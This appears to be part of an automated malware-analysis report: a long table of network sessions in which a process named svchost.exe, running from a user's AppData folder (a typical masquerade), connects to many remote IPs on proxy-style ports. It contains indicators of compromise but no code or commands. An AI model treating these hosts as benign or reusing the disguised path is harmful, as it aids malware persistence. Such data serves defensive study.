                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4818192.168.2.56533545.144.30.20544356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4819192.168.2.565030195.90.216.75108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4820192.168.2.56508454.248.238.1108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4821192.168.2.565059121.164.200.18108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4822192.168.2.565003111.90.150.109108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4823192.168.2.56501462.171.131.1013744743080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4824192.168.2.56504334.95.243.122808143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4825192.168.2.56500638.54.16.978043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4826192.168.2.56502747.96.145.14888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4827192.168.2.56534731.7.65.1844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4828192.168.2.565245104.16.109.1438056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4829192.168.2.565012171.250.222.13108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4830192.168.2.56534831.7.65.1844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4831192.168.2.56535231.7.65.1844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4832192.168.2.56535531.7.65.1844356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4833192.168.2.56509651.15.247.931637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4834192.168.2.56378292.204.134.383074756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4835192.168.2.56510243.131.248.1651567343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4836192.168.2.565112188.166.17.18888156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4837192.168.2.56525945.12.30.2318056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4838192.168.2.565263104.24.193.1868056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4839192.168.2.56513118.135.211.182312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4840192.168.2.56509545.11.95.166600256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4841192.168.2.565090154.239.3.185808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4842192.168.2.56511943.131.246.771567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4843192.168.2.565272192.154.244.92900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4844192.168.2.565179130.162.213.175312956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4845192.168.2.56522220.111.54.16812356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4846192.168.2.565213119.28.4.112999956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4847192.168.2.565176194.182.178.90312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4848192.168.2.563808192.169.226.962961856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4849192.168.2.565292104.18.81.768056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4850192.168.2.56525738.162.8.232312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4851192.168.2.565301104.17.50.458056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4852192.168.2.565275192.163.200.933909556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4853192.168.2.56518494.177.106.178232456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4854192.168.2.565180115.239.234.43730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4855192.168.2.56521594.30.152.1728056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4856192.168.2.565170202.139.198.15303056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4857192.168.2.565177138.36.150.16108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4858192.168.2.565310162.159.242.628056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4859192.168.2.565173222.255.238.1598056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4860192.168.2.565207182.106.220.252909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4861192.168.2.565230120.79.101.0888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4862192.168.2.564900146.190.85.79312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4863192.168.2.565219203.19.38.114108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4864192.168.2.565284129.213.150.2058056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4865192.168.2.56522960.190.68.154730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4866192.168.2.565315162.241.53.726219256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4867192.168.2.565369104.20.198.498056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4868192.168.2.565236103.49.114.195808043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4869192.168.2.565026117.160.250.163882856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4870192.168.2.56538465.49.38.202312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4871192.168.2.56526743.155.130.1821567343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4872192.168.2.56532546.51.249.135312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4873192.168.2.56533135.79.120.242312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4874192.168.2.565276163.15.183.33312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4875192.168.2.5650885.10.249.159108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4876192.168.2.565251183.230.162.122909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4877192.168.2.565408104.25.58.398056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4878192.168.2.565409185.238.228.968056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4879192.168.2.565432104.21.31.1898056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4880192.168.2.565302213.136.75.855023856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4881192.168.2.565455172.67.181.328043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4882192.168.2.563825194.226.164.214108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4883192.168.2.565336221.153.92.398056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4884192.168.2.565419162.241.46.404609756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4885192.168.2.56544534.49.208.2218043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4886192.168.2.56539768.183.143.1348056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4887192.168.2.56385772.210.208.101414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4888192.168.2.56533780.67.8.68056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4889192.168.2.563964162.241.50.1793141456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4890192.168.2.5653675.135.137.135912456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4891192.168.2.56536058.234.116.1978056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4892192.168.2.565411192.111.137.35414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4893192.168.2.56539995.164.207.1575837856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4894192.168.2.565492172.67.181.978056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4895192.168.2.565506104.16.105.1068056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4896192.168.2.565321171.244.140.1603455956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4897192.168.2.56383034.93.157.872180256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4898192.168.2.549163172.67.140.8744356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4899192.168.2.549165172.67.140.8744356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4900192.168.2.565371120.76.42.209888843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4901192.168.2.565460162.223.94.1668043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4902192.168.2.56547967.201.59.70414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4903192.168.2.565500198.99.81.197808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4904192.168.2.565393198.105.101.129575856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4905192.168.2.56538727.96.235.1718043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4906192.168.2.56540618.169.83.87108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4907192.168.2.56535052.172.1.186312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4908192.168.2.56540034.92.12.210923856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4909192.168.2.565386185.158.114.142569743080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4910192.168.2.565523192.154.244.92900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4911192.168.2.565389120.78.191.688056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4912192.168.2.56545418.135.133.1168043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4913192.168.2.565526104.238.111.107896856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4914192.168.2.56542214.103.24.20800056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4915192.168.2.56547623.137.248.197888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4916192.168.2.565241117.160.250.1638243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4917192.168.2.565426221.6.139.190900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4918192.168.2.564739210.72.11.46312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4919192.168.2.56391694.247.244.120312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4920192.168.2.549152172.67.182.968056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4921192.168.2.565256117.160.250.130889956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4922192.168.2.56544843.255.113.232808143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4923192.168.2.565522184.185.2.12414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4924192.168.2.549169104.19.85.2148043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4925192.168.2.565477119.3.215.41888843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4926192.168.2.564773117.54.114.988056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4927192.168.2.56526636.134.91.82888843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4928192.168.2.565403176.99.2.43108143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4929192.168.2.565124123.56.1.50312956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4930192.168.2.565486102.223.20.2178056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4931192.168.2.56539995.164.207.1575837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4932192.168.2.56552045.138.87.238108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4933192.168.2.564044198.12.255.1933221656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4934192.168.2.562768134.122.26.118056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4935192.168.2.565442102.132.201.2028043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4936192.168.2.565489103.163.51.2548043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4937192.168.2.549174129.213.150.2058056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4938192.168.2.565530121.164.200.18108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4939192.168.2.56553351.15.247.931637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4940192.168.2.56552845.11.95.165521956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4941192.168.2.565525202.162.219.10108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4942192.168.2.549161188.166.17.18888156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4943192.168.2.549162128.140.26.128043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4944192.168.2.563776111.20.217.178909156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4945192.168.2.549156212.127.93.185808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4946192.168.2.54917593.190.142.573128056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4947192.168.2.54917034.95.243.122808143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4948192.168.2.564001148.72.215.794720256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4949192.168.2.54917143.131.248.1651567343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4950192.168.2.564869162.241.137.1974060443080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4951192.168.2.56482645.249.48.201415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4952192.168.2.549192119.28.4.112999956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4953192.168.2.549168203.171.19.988056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4954192.168.2.549246192.154.244.92900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4955192.168.2.54924734.49.208.2218043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4956192.168.2.5492105.161.219.13422856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4957192.168.2.54921494.131.64.945837856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


